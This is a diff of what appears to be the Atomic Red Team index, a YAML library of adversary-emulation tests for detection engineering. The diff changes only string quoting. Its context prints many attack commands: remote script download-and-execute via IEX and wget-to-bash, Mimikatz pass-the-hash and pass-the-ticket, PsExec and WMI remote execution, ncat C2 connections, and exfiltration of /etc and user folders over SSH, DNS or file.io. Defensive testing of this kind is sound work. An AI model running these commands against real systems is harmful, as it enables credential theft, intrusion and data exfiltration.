@@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: 
@@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" -' + ' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} 
@@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. -' + ' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} -' + ' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt -' + ' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" 
@@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null -' + ' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore -' + ' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. -' + ' supported_platforms: - windows input_arguments: 
@@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) -' + ' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} -' + ' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. -' + ' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" -' + ' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 -' + ' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 
@@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") -' + ' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} -' + ' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} -' + ' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA -' + ' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. -' + ' supported_platforms: - windows input_arguments: 
@@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" -' + ' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" -' + ' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -' + ' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt 
@@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force 
@@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. -' + ' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt -' + ' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares -' + ' supported_platforms: - windows input_arguments: 
@@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" -' + ' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} -' + ' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). -' + ' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 -' + ' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: 
@@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force -' + ' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} -' + ' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} -' + ' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} -' + ' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos 
@@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' -' + ' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! -' + ' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} -' + ' cleanup_command: 'del #{local_path} >nul 2>&1 -' + ' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! -' + ' supported_platforms: - windows input_arguments: 
@@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} -' + ' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") -' + ' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. -' + ' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility -' + ' supported_platforms: - linux - macos 
@@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present -' + ' prereq_command: 'which whois && which timeout -' + ' get_prereq_command: 'echo "Please install timeout and the whois package" -' + ' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} -' + ' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl 
@@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} -' + ' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} -' + ' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) -' + ' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} -' + ' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} -' + ' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. -' + ' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} -' + ' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } -' + ' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b 
@@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. -' + ' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks -' + ' supported_platforms: - macos - linux 
@@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 -' + ' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; -' + ' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz -' + ' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' -' + ' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) -' + ' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} -' + ' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - windows input_arguments: 
